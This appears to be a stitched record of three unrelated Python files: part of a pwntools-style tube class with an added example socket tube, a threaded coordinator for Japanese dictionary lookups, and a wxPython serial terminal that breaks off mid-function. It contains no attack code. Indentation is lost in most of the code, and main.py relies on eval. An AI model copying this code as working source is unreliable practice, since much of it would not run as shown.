>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
                tube_a << tube_b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
                tube_a << tube_b << tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
        Shorthand for connecting tubes to each other.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
        Closes the tube for further reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
.. doctest::
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
        Should raise ``exceptions.EOFError`` if it is unable to send any
        more, because of a closed tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True if there is data
available within the timeout, ignoring the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
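# ---------------------------------------------------------------------------
# Illustrative only: a minimal sketch of a concrete tube built on a plain TCP
# socket, showing how the "minimal interface" above (recv_raw, send_raw, ...)
# could be filled in. This is NOT the library's own socket tube; the class and
# attribute names below are assumptions made for the example.
# ---------------------------------------------------------------------------
import select as _select
import socket as _socket

class example_socket_tube(tube):
    def __init__(self, host, port):
        self.sock = _socket.create_connection((host, port))
        tube.__init__(self)

    def recv_raw(self, numb):
        try:
            data = self.sock.recv(numb)
        except _socket.timeout:
            return None                 # timeout -> None, per the contract above
        if not data:
            raise EOFError              # closed connection -> EOFError
        return data

    def send_raw(self, data):
        try:
            self.sock.sendall(data)
        except _socket.error:
            raise EOFError              # closed tube -> EOFError

    def settimeout_raw(self, timeout):
        self.sock.settimeout(timeout)

    def can_recv_raw(self, timeout):
        return bool(_select.select([self.sock], [], [], timeout)[0])

    def connected_raw(self, direction):
        # crude approximation: report "connected" while the socket is open
        return self.sock is not None

    def fileno(self):
        return self.sock.fileno()

    def shutdown_raw(self, direction):
        how = _socket.SHUT_RD if direction == 'recv' else _socket.SHUT_WR
        self.sock.shutdown(how)

    def close(self):
        if self.sock is not None:
            self.sock.close()
            self.sock = None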
|
coordinator.py
|
from collections import defaultdict
from threading import Thread
from typing import Any, DefaultDict, Protocol
from custom_types.alternative_string_types import Kaki
from custom_types.response_types import FullResponseItem
from modules import forvo, jisho, ojad, suzuki, tangorin, wadoku, wanikani
class Module(Protocol): # pylint: disable=too-few-public-methods
NAME: str
def main(self, word_list: list[Kaki]) -> dict: ...
MODULES = (
forvo,
jisho,
ojad,
suzuki,
tangorin,
wadoku,
wanikani,
)
def get_info(word_list: list[Kaki]) -> list[FullResponseItem]:
results_dict = generate_results_dict(word_list)
response = generate_response(results_dict, word_list)
return response
def generate_results_dict(word_list: list[Kaki]) -> DefaultDict[str,dict[Kaki, Any]]:
results_dict: DefaultDict[str,dict[Kaki, Any]] = defaultdict(dict)
def call_script(module: Module, word_list: list[Kaki]) -> None:
results_dict[module.NAME] = module.main(word_list)
threads: list[Thread] = [
Thread(target=call_script, args=[module, word_list])
for module in MODULES
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return results_dict
def generate_response(
results_dict: DefaultDict[str,dict[Kaki, Any]],
word_list: list[Kaki],
) -> list[FullResponseItem]:
resp: list[FullResponseItem] = [
{'word' : word} | # type: ignore
{module.NAME : results_dict[module.NAME][word] for module in MODULES} # type: ignore
for word in word_list
]
return resp
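# Illustrative only: a stand-in object satisfying the Module protocol and a
# sketch of the response shape it produces. The module name "dummy" and the
# sample word are assumptions for the example, not part of the real pipeline.
if __name__ == "__main__":
    class _DummyModule:
        NAME = "dummy"

        @staticmethod
        def main(word_list: list[Kaki]) -> dict:
            return {word: {"found": True} for word in word_list}

    _word = "犬"  # hypothetical input; Kaki is assumed to be a str-like type
    _results: DefaultDict[str, dict[Kaki, Any]] = defaultdict(dict)
    _results[_DummyModule.NAME] = _DummyModule.main([_word])
    # generate_response() merges each per-module result with the word itself:
    print({"word": _word} | {_DummyModule.NAME: _results[_DummyModule.NAME][_word]})
    # -> {'word': '犬', 'dummy': {'found': True}}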
|
main.py
|
# -*- coding:utf-8 -*-
import sys, os
import wx
import fcvsGUI as ui
import threading
import re
import serial
import time
from wx.lib.wordwrap import wordwrap
import _winreg as winreg
import itertools
import icon32
import pkg_resources
import zipfile
from cStringIO import StringIO
import webbrowser
import glob
MAINMENU = 0
SUBMENU = 1
MENUITEM = 2
CHECKITEM = 3
SEPARATOR = 4
RADIOITEM = 5
ASCII = 0
HEX = 1
THREAD_TIMEOUT = 0.5
AppTitle = 'MyTerm for FCVS'
AppVersion = '1.0'
SERIALRX = wx.NewEventType() # create a custom event type
EVT_SERIALRX = wx.PyEventBinder(SERIALRX, 0) # bind to serial data receive events
class SerialRxEvent(wx.PyCommandEvent):
eventType = SERIALRX
def __init__(self, windowID, data):
wx.PyCommandEvent.__init__(self, self.eventType, windowID)
self.data = data
def Clone(self):
return self.__class__(self.GetId(), self.data)
SERIALEXCEPT = wx.NewEventType()
EVT_SERIALEXCEPT = wx.PyEventBinder(SERIALEXCEPT, 0)
class SerialExceptEvent(wx.PyCommandEvent):
eventType = SERIALEXCEPT
def __init__(self, windowID, param):
wx.PyCommandEvent.__init__(self, self.eventType ,windowID)
self.param = param
def Clone(self):
return self.__class__(self.GetId(), self.param)
regex_matchTTY = re.compile('/tty/(?P<tty>\w+)')
def EnumerateSerialPorts():
"""Yield the names of the serial ports available on this computer.
On Windows the Win32 registry is used to enumerate COM ports;
on Linux /sys/class/tty is scanned.
"""
if sys.platform == 'win32':
pathDevi = r'HARDWARE\DEVICEMAP'
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, pathDevi)
except WindowsError:
# failed to read the registry;
# fall back to returning COM1 ~ COM16
for i in range(1, 17):
yield "COM" + str(i)
return
pathCOMM = r'HARDWARE\DEVICEMAP\SERIALCOMM'
try:
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, pathCOMM)
except WindowsError:
# when no serial port is present,
# SERIALCOMM does not exist under "HARDWARE\DEVICEMAP\",
# so return nothing.
return
for i in itertools.count():
try:
val = winreg.EnumValue(key, i)
yield str(val[1])
except EnvironmentError:
break
elif sys.platform.startswith('linux'):
for t in glob.glob('/sys/class/tty/*/device/driver'):
r = regex_matchTTY.search(t)
if r:
yield '/dev/%s' % r.group('tty')
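# Menu definition table consumed by MyApp.MakeMenu(). Entries take the forms:
#   (MENUITEM/CHECKITEM/RADIOITEM, id, label, help string, handler expression)
#   (SUBMENU, label, (nested entries, ...))
#   (SEPARATOR,)
# The whole tuple starts with MAINMENU, followed by (menu label, entries) pairs.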
MenuDefs = (
MAINMENU,
('&File', (
(MENUITEM, wx.NewId(), '&Save', 'Save to a file' , 'self.OnSave' ),
(SEPARATOR,),
(MENUITEM, wx.NewId(), '&Exit MyTerm', 'Exit MyTerm', 'self.OnExitApp' ),
)),
('&Port', (
(MENUITEM, wx.NewId(), '&Open', 'Open the Port' , 'self.OnOpenPort' ),
(MENUITEM, wx.NewId(), '&Close', 'Close the Port', 'self.OnClosePort' ),
)),
('&Display', (
(MENUITEM, wx.NewId(), '&Show Setting Bar', 'Show Setting Bar', 'self.OnShowSettingBar' ),
(CHECKITEM, wx.NewId(), '&Always on top', 'keep the window always on top', 'self.OnAlwayOnTop' ),
(CHECKITEM, wx.NewId(), '&Local echo', 'echo what you typed', 'self.OnLocalEcho' ),
(SUBMENU, '&Rx view as', (
(RADIOITEM, wx.NewId(), '&Ascii', '', 'self.OnRxAsciiMode' ),
(RADIOITEM, wx.NewId(), '&Hex', '', 'self.OnRxHexMode' ),
)),
# (SUBMENU, 'Tx view as', (
# (RADIOITEM, wx.NewId(), 'ASCII', '', 'self.OnTxAsciiMode' ),
# (RADIOITEM, wx.NewId(), 'HEX', '', 'self.OnTxHexMode' ),
# )),
# (CHECKITEM, wx.NewId(), 'S&tatus Bar', 'Show Status Bar', 'self.OnShowStatusBar' ),
)),
('&Help', (
(MENUITEM, wx.NewId(), '&About', 'About MyTerm', 'self.OnAbout' ),
))
)
regex_matchPort = re.compile('COM(?P<port>\d+)')
regex_matchCmdList = re.compile(
'\|\s+(?P<index>\d)\s+\|\s+(?P<time>\d+|-)\s+\|\s+(?P<count>\d+|-)\s+\|\s+(?P<setvolt>\d+|-)\s+\|\s+(?P<realvolt>[0-9.]+|-)\s+\|')
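# Matches one row of the device's "list" command output (see ThreadAnalysis),
# e.g. "| 1 | 12345 |   -   |   111    | 1111.111  |" yields
# index='1', time='12345', count='-', setvolt='111', realvolt='1111.111'.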
serialport = serial.Serial()
class MyApp(wx.App):
def OnInit(self):
self.frame = ui.MyFrame(None, wx.ID_ANY, "")
my_data = pkg_resources.resource_string(__name__,"library.zip")
filezip = StringIO(my_data)
zf = zipfile.ZipFile(filezip)
data = zf.read("media/icon16.ico")
# self.frame.SetIcon(icon16.geticon16Icon())
icon = wx.EmptyIcon()
icon.CopyFromBitmap(wx.ImageFromStream(StringIO(data), wx.BITMAP_TYPE_ICO).ConvertToBitmap())
self.frame.SetIcon(icon)
# self.frame.SetIcon(wx.Icon("media\icon16.ico", wx.BITMAP_TYPE_ICO, 16, 16))
self.frame.SplitterWindow.SetSashSize(0)
self.frame.SplitterWindow.SetSashPosition(160, True)
# self.frame.choicePort.AppendItems(('COM1', 'COM2', 'COM3', 'COM4', 'COM5', 'COM6', 'COM7', 'COM8'))
self.OnEnumPorts()
self.frame.choicePort.Select(0)
self.frame.cmbBaudRate.Select(6)
# initial variables
self.rxmode = ASCII
self.txmode = ASCII
self.localEcho = False
self.rxCount = 0
self.txCount = 0
# Make a menu
menuBar = wx.MenuBar()
self.MakeMenu(menuBar, MenuDefs)
self.frame.SetMenuBar(menuBar)
# bind events
self.frame.btnHideBar.Bind(wx.EVT_BUTTON, self.OnHideSettingBar)
self.frame.btnOpen.Bind(wx.EVT_BUTTON, self.OnBtnOpen)
self.frame.btnEnumPorts.Bind(wx.EVT_BUTTON, self.OnEnumPorts)
self.frame.btnClear.Bind(wx.EVT_BUTTON, self.OnClear)
# self.frame.Bind(wx.EVT_WINDOW_DESTROY, self.Cleanup)
self.frame.Bind(wx.EVT_CLOSE, self.Cleanup)
self.Bind(EVT_SERIALEXCEPT, self.OnSerialExcept)
self.Bind(EVT_SERIALRX, self.OnSerialRx)
self.frame.txtctlMain.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
self.frame.txtctlMain.Bind(wx.EVT_CHAR, self.OnSerialWrite)
self.frame.txtctlMain.Bind(wx.EVT_TEXT_PASTE, self.OnPaste)
self.frame.txtctlMain.Bind(wx.EVT_TEXT_URL, self.OnURL)
self.frame.btnGetInfo.Bind(wx.EVT_BUTTON, self.OnBtnGetInfo)
self.frame.btnSetInfo.Bind(wx.EVT_BUTTON, self.OnBtnSetInfo)
self.frame.btnSave.Bind(wx.EVT_BUTTON, self.OnBtnSave)
self.SetTopWindow(self.frame)
self.frame.SetTitle( AppTitle )
self.frame.Show()
self.evtPortOpen = threading.Event()
self.evtSerialCmdBuffComplete = threading.Event()
self.IsSerialCmdBuffForAnalysis = False
self.SerialCmdBuffForAnalysis = ''
return True
def OnBtnGetInfo(self, evt = None):
if serialport.isOpen():
serialport.write('\n')
serialport.write('list\n')
self.IsSerialCmdBuffForAnalysis = True
t = threading.Thread(target = self.ThreadAnalysis)
t.start()
def ThreadAnalysis(self):
"""
the string to analyze looks as follows:
|No.| Time | Count | Set Volt | Real Volt |
| | (ms) | | (mV) | (mV) |
|---+-------+-------+----------+-----------|
| 1 | 12345 | - | 111 | 1111.111 |
| 2 | - | 22 | 222 | 2222.222 |
| 3 | - | 33 | 333 | 3333.333 |
| 4 | - | 44 | 444 | 4444.444 |
| 5 | - | 55 | 555 | 5555.555 |
| 6 | - | - | 666 | 6666.666 |
"""
if self.evtSerialCmdBuffComplete.wait(1.0):
self.evtSerialCmdBuffComplete.clear()
for l in self.SerialCmdBuffForAnalysis.splitlines():
r = regex_matchCmdList.search(l)
if r:
i = int(r.group('index'))
if i == 1:
self.SetT(i, int(r.group('time')))
if 2 <= i <= 5:
self.SetC(i, int(r.group('count')))
if 1 <= i <= 6:
self.SetV(i, int(r.group('setvolt')))
self.SetRV(i, r.group('realvolt'))
self.SerialCmdBuffForAnalysis = ''
else:
print 'wait list timeout.'
def OnBtnSetInfo(self, evt = None):
if serialport.isOpen():
data = (((1, self.GetT(1)),),
((2, self.GetC(2)), (3, self.GetC(3)), (4, self.GetC(4)), (5, self.GetC(5)),),
((1, self.GetV(1)), (2, self.GetV(2)), (3, self.GetV(3)), (4, self.GetV(4)), (5, self.GetV(5)), (6, self.GetV(6)),),)
t = threading.Thread(target = ThreadSetInfo, args = (data,))
t.start()
def OnBtnSave(self, evt = None):
if serialport.isOpen():
serialport.write('\n')
serialport.write('save\n')
def GetT(self, index):
if index == 1:
return eval('self.frame.spin_ctrl_T' + ('%s' % index) + '.GetValue()')
def GetC(self, index):
if 2 <= index <= 5:
return eval('self.frame.spin_ctrl_C' + ('%s' % index) + '.GetValue()')
def GetV(self, index):
if 1 <= index <= 6:
return eval('self.frame.spin_ctrl_V' + ('%s' % index) + '.GetValue()')
def SetT(self, index, value):
if index == 1:
eval('self.frame.spin_ctrl_T' + ('%s' % index) + '.SetValue(value)')
def SetC(self, index, value):
if 2 <= index <= 5:
eval('self.frame.spin_ctrl_C' + ('%s' % index) + '.SetValue(value)')
def SetV(self, index, value):
if 1 <= index <= 6:
eval('self.frame.spin_ctrl_V' + ('%s' % index) + '.SetValue(value)')
def SetRV(self, index, label):
if 1 <= index <= 6:
eval('self.frame.label_RV' + ('%s' % index) + '.SetLabel(" %s" % label)')
def OnURL(self, evt = None):
if evt.MouseEvent.LeftUp():
webbrowser.open(evt.GetEventObject().GetValue())
evt.Skip()
def OnClear(self, evt = None):
self.frame.txtctlMain.Clear()
self.rxCount = 0
self.txCount = 0
self.frame.statusbar.SetStatusText('Rx:%d' % self.rxCount, 1)
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
def OnSave(self, evt = None):
dlg = wx.FileDialog(self.frame,
message="Save file as ...",
defaultDir = os.getcwd(),
wildcard = "Text Files|*.txt",
style = wx.SAVE | wx.CHANGE_DIR)
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
print "You selected %s\n" % path,
# read file
f = open(path, 'w')
f.write(self.frame.txtctlMain.GetValue())
f.close()
dlg.Destroy()
def GetPort(self):
r = regex_matchPort.search(self.frame.choicePort.GetLabelText())
if r:
return int(r.group('port')) - 1
return
def GetBaudRate(self):
return int(self.frame.cmbBaudRate.GetValue())
def GetDataBits(self):
s = self.frame.choiceDataBits.GetLabelText()
if s == '5':
return serial.FIVEBITS
elif s == '6':
return serial.SIXBITS
elif s == '7':
return serial.SEVENBITS
elif s == '8':
return serial.EIGHTBITS
def GetParity(self):
s = self.frame.choiceParity.GetLabelText()
if s == 'None':
return serial.PARITY_NONE
elif s == 'Even':
return serial.PARITY_EVEN
elif s == 'Odd':
return serial.PARITY_ODD
elif s == 'Mark':
return serial.PARITY_MARK
elif s == 'Space':
return serial.PARITY_SPACE
def GetStopBits(self):
s = self.frame.choiceStopBits.GetLabelText()
if s == '1':
return serial.STOPBITS_ONE
elif s == '1.5':
return serial.STOPBITS_ONE_POINT_FIVE
elif s == '2':
return serial.STOPBITS_TWO
def MakeMenu(self, menuBar, args, menu = None):
if args[0] == MENUITEM:
menu.Append(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == CHECKITEM:
menu.AppendCheckItem(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == SEPARATOR:
menu.AppendSeparator()
elif args[0] == RADIOITEM:
menu.AppendRadioItem(args[1], args[2], args[3])
eval('self.frame.Bind(wx.EVT_MENU,' + args[4] + ', id = args[1])')
elif args[0] == SUBMENU:
submenu = wx.Menu()
for i in args[2:][0]:
self.MakeMenu(menuBar, i, submenu)
menu.AppendSubMenu(submenu, args[1])
elif args[0] == MAINMENU:
for a in args[1:]:
m = wx.Menu()
for i in a[1]:
self.MakeMenu(menuBar, i, m)
menuBar.Append(m, a[0])
def OnEnumPorts(self, evt = None):
self.frame.choicePort.Clear()
for p in EnumerateSerialPorts():
self.frame.choicePort.AppendItems((p,))
def OnBtnOpen(self, evt = None):
if serialport.isOpen():
self.OnClosePort(evt)
else:
self.OnOpenPort(evt)
def OnOpenPort(self, evt = None):
serialport.port = self.GetPort()
serialport.baudrate = self.GetBaudRate()
serialport.bytesize = self.GetDataBits()
serialport.stopbits = self.GetStopBits()
serialport.parity = self.GetParity()
serialport.rtscts = self.frame.chkboxrtscts.IsChecked()
serialport.xonxoff = self.frame.chkboxxonxoff.IsChecked()
serialport.timeout = THREAD_TIMEOUT
try:
serialport.open()
except serial.SerialException, e:
dlg = wx.MessageDialog(None, str(e), "Serial Port Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
else:
self.StartThread()
self.frame.SetTitle("%s on %s [%s, %s%s%s%s%s]" % (
AppTitle,
serialport.portstr,
serialport.baudrate,
serialport.bytesize,
serialport.parity,
serialport.stopbits,
serialport.rtscts and ' RTS/CTS' or '',
serialport.xonxoff and ' Xon/Xoff' or '',
)
)
self.frame.btnOpen.SetBackgroundColour((0,0xff,0x7f))
self.frame.btnOpen.SetLabel('Opened')
self.frame.btnOpen.Refresh()
def OnClosePort(self, evt = None):
if serialport.isOpen():
self.StopThread()
serialport.close()
self.frame.SetTitle( AppTitle )
self.frame.btnOpen.SetBackgroundColour(wx.NullColour)
self.frame.btnOpen.SetLabel('Open')
self.frame.btnOpen.Refresh()
def StartThread(self):
"""Start the receiver thread"""
self.thread = threading.Thread(target = self.UartCommThread)
# self.thread.setDaemon(1)
self.evtPortOpen.set()
self.thread.start()
def StopThread(self):
"""Stop the receiver thread, wait util it's finished."""
if self.thread is not None:
self.evtPortOpen.clear() #clear alive event for thread
self.thread.join() #wait until thread has finished
self.thread = None
def UartCommThread(self):
""" sub process for receive data from uart port """
while self.evtPortOpen.is_set():
# print 'running'
try:
text = serialport.read(1) # block for THREAD_TIMEOUT = 0.5s
except serial.serialutil.SerialException:
evt = SerialExceptEvent(self.frame.GetId(), -1)
self.frame.GetEventHandler().AddPendingEvent(evt)
print 'thread exit for except'
return -1
if text:
# print ord(text),
n = serialport.inWaiting()
if n:
text = text + serialport.read(n)
if self.rxmode == HEX:
text = ''.join(str(ord(t)) + ' ' for t in text) # text = ''.join([(c >= ' ') and c or '<%d>' % ord(c) for c in text])
self.frame.txtctlMain.AppendText(text)
else:
text = text.replace('\n', '')
if -1 != text.find(chr(wx.WXK_BACK)):
for t in text:
if t == chr(wx.WXK_BACK): #0x08
self.frame.txtctlMain.Remove(self.frame.txtctlMain.GetLastPosition() - 1,
self.frame.txtctlMain.GetLastPosition() )
else:
self.frame.txtctlMain.AppendText(t)
else:
if self.IsSerialCmdBuffForAnalysis:
self.SerialCmdBuffForAnalysis += text
if '\r\r' in self.SerialCmdBuffForAnalysis:
evt = SerialRxEvent(self.frame.GetId(), self.SerialCmdBuffForAnalysis)
self.frame.GetEventHandler().AddPendingEvent(evt)
self.IsSerialCmdBuffForAnalysis = False
self.evtSerialCmdBuffComplete.set()
else:
self.frame.txtctlMain.AppendText(text)
"""Using event to display is slow when the data is too big."""
# evt = SerialRxEvent(self.frame.GetId(), text)
# self.frame.GetEventHandler().AddPendingEvent(evt)
self.rxCount += len(text)
self.frame.statusbar.SetStatusText('Rx:%d' % self.rxCount, 1)
print 'exit thread'
def OnSerialRx(self, evt):
"""Handle input from the serial port."""
text = evt.data
if self.rxmode == HEX:
text = ''.join(str(ord(t)) + ' ' for t in text) # text = ''.join([(c >= ' ') and c or '<%d>' % ord(c) for c in text])
self.frame.txtctlMain.AppendText(text)
def OnSerialWrite(self, evt = None):
keycode = evt.GetKeyCode()
# controlDown = evt.CmdDown()
# altDown = evt.AltDown()
# shiftDown = evt.ShiftDown()
print keycode,
# if keycode == wx.WXK_SPACE:
# print "you pressed the spacebar!"
# elif controlDown and altDown:
# print keycode
if self.localEcho:
evt.Skip()
if serialport.isOpen():
if keycode < 256:
serialport.write(chr(keycode))
self.txCount += 1
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
else:
print "Extra Key:", keycode
def OnKeyDown(self ,evt = None):
if self.localEcho:
evt.Skip()
else:
keycode = evt.GetKeyCode()
if wx.WXK_RETURN == keycode or wx.WXK_BACK == keycode:
print keycode,
if serialport.isOpen():
serialport.write(chr(keycode))
self.txCount += 1
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
else:
evt.Skip()
def OnPaste(self ,evt = None):
data = wx.TextDataObject()
wx.TheClipboard.GetData(data)
if serialport.isOpen():
serialport.write( data.GetText() )
self.txCount += len( data.GetText() )
self.frame.statusbar.SetStatusText('Tx:%d' % self.txCount, 2)
if self.localEcho:
evt.Skip()
def OnSerialExcept(self, evt):
param = evt.param
if param == -1:
self.StopThread()
serialport.close()
self.frame.SetTitle( AppTitle )
self.frame.btnOpen.SetBackgroundColour(wx.NullColour)
self.frame.btnOpen.SetLabel('Open')
self.frame.btnOpen.Refresh()
else:
print 'OnSerialExcept() invalid parameter:%d' % param
def OnHideSettingBar(self, evt = None):
self.frame.SplitterWindow.SetSashPosition(1, True)
def OnShowSettingBar(self, evt = None):
self.frame.SplitterWindow.SetSashPosition(160, True)
def OnShowStatusBar(self, evt = None):
pass
def OnRxAsciiMode(self, evt = None):
self.rxmode = ASCII
self.frame.statusbar.SetStatusText('Rx:Ascii', 3)
def OnRxHexMode(self, evt = None):
self.rxmode = HEX
self.frame.statusbar.SetStatusText('Rx:Hex', 3)
def OnTxAsciiMode(self, evt = None):
self.txmode = ASCII
self.frame.statusbar.SetStatusText('Tx:Ascii', 4)
def OnTxHexMode(self, evt = None):
self.txmode = HEX
self.frame.statusbar.SetStatusText('Tx:Hex', 4)
def OnAlwayOnTop(self, evt = None):
if evt.Selection == 1:
style = self.frame.GetWindowStyle()
# stay on top
self.frame.SetWindowStyle( style | wx.STAY_ON_TOP )
elif evt.Selection == 0:
style = self.frame.GetWindowStyle()
# normal behavior again
self.frame.SetWindowStyle( style & ~wx.STAY_ON_TOP )
def OnLocalEcho(self, evt = None):
if evt.Selection == 1:
self.localEcho = True
self.frame.statusbar.SetStatusText('Local echo:On', 4)
elif evt.Selection == 0:
self.localEcho = False
self.frame.statusbar.SetStatusText('Local echo:Off', 4)
def OnAbout(self, evt = None):
